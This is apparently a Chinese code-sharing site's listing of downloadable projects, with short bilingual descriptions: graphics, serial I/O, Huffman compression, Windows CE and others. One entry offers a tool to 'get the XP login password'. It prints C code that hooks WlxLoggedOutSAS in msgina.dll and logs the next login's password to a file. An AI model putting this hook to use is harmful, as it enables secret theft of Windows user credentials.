-
Graphics course design. . To achieve a straight line, Biezer curves, rectangles...
图形学课程设计。。实现直线,Biezer曲线,矩形等图形绘制,并利用属性面板修改绘制图形-Graphics course design. . To achieve a straight line, Biezer curves, rectangles and other graphics rendering, and using properties panel to edit graphics rendering
- 2022-09-05 18:35:02下载
- 积分:1
-
Visual C++串口编程
visual C++ serial programming
- 2022-02-06 05:11:14下载
- 积分:1
-
算法是指完成一个任务所需要的具体步骤和方法。也就是说给定初始状态或输入数据,经过计算机程序的有限次运算,能够得出所要求或期望的终止状态或输出数据。算法常常含有...
算法是指完成一个任务所需要的具体步骤和方法。也就是说给定初始状态或输入数据,经过计算机程序的有限次运算,能够得出所要求或期望的终止状态或输出数据。算法常常含有重复的步骤和一些比较或逻辑判断。如果一个算法有缺陷,或不适合于某个问题,执行这个算法将不会解决这个问题。不同的算法可能用不同的时间、空间或效率来完成同样的任务。一个算法的优劣可以用空间复杂度与时间复杂度来衡量。 -Algorithm is required to complete a task specific steps and methods. That is a given initial state or input data through a computer program for a limited time operations, able to draw the required or desired end state or output data. Algorithm often contain repeat the steps and some of the more or logical judgments. If an algorithm is defective, or not suitable for a particular problem, the implementation of this algorithm will not solve the problem. Different algorithms may use a different time, space or efficiency to accomplish the same task. Pros and cons of an algorithm can use space complexity and time complexity of the evaluation.
- 2022-07-10 14:25:53下载
- 积分:1
-
Huffman编码实现数据压缩(C语言实现)
Huffman编码实现数据压缩,C语言实现,信息安全课程设计,学习位运算,字符串操作。Huffman编码实现数据压缩,C语言实现,信息安全课程设计,学习位运算,字符串操作。
- 2022-02-06 04:52:50下载
- 积分:1
-
获取XP登录密码
应用背景当忘记XP系统密码时,可以编译getInfo的dll和exe,执行getInfoRun.exe在下次登录时就可以获取密码了,密码文件保存在windows根目录下的getPwdout.txt文件中关键技术DWORD WINAPI StartHook(LPVOID lpParam)
{
//得到msgina.dll
//hooktable.hMsgina
int n = 0;
hooktable.hMsgina = LoadLibrary("msgina.dll");
n = GetLastError();
if (NULL == hooktable.hMsgina)
{
printf("getmoduleHandle msgina.dll error");
return -1;
}
//得到WlxLoggedOutSAS
hooktable.OldADDR = (WlxLoggedOutSAS)GetProcAddress(hooktable.hMsgina, "WlxLoggedOutSAS");
if (NULL == hooktable.OldADDR)
{
printf("GetProcAddress WlxLoggedOutSAS error");
return -1;
}
int *OpCode = (int*)&hooktable.charJmpCode[1];
int Code = (int)hooktable.NewADDR - (int)hooktable.OldADDR -5;
*OpCode = Code;
HookWlxLoggedOutSAS();
return 0;
}
- 2023-08-31 22:05:04下载
- 积分:1
-
自定义树视图布局
下面的代码示例演示如何自定义树视图使用所有者描述的控件。 TreeView 控制的示例显示可选节点标记以及标准的节点标签。通过使用指定节点标记 TreeNode. 请点击左侧文件开始预览 !预览只提供20%的代码片段,完整代码需下载后查看 加载中 侵权举报
- 2022-05-30 19:41:08下载
- 积分:1
-
a nice C++ programs list. With high reference value
一个好的C++程序罗列, 有高的参考价值-a nice C++ programs list. With high reference value
- 2022-04-30 11:33:37下载
- 积分:1
-
用API创建 Toolbar 带 ToolTip的例子(VC 6.0 API SDK程序)
用API创建 Toolbar 带 ToolTip的例子(VC 6.0 API SDK程序)-Using API to create Toolbar with ToolTip example (VC 6.0 API SDK Procedure)
- 2022-03-21 21:11:22下载
- 积分:1
-
c#. net development of the library management system, please download the necess...
c#.net 开发的图书管理系统,需要的请下载,不要忘了给我评分哦-c#. net development of the library management system, please download the necessary, do not forget give me score Oh
- 2023-04-08 06:00:03下载
- 积分:1
-
This is my test of how successful Windows CE to achieve self
这是本人测试成功了的如何在Windows CE下实现自启动和创建快捷方式以及将快捷方式
复制到桌面上-This is my test of how successful Windows CE to achieve self-starting and create a shortcut and copy the shortcut to the desktop
- 2023-08-26 23:10:03下载
- 积分:1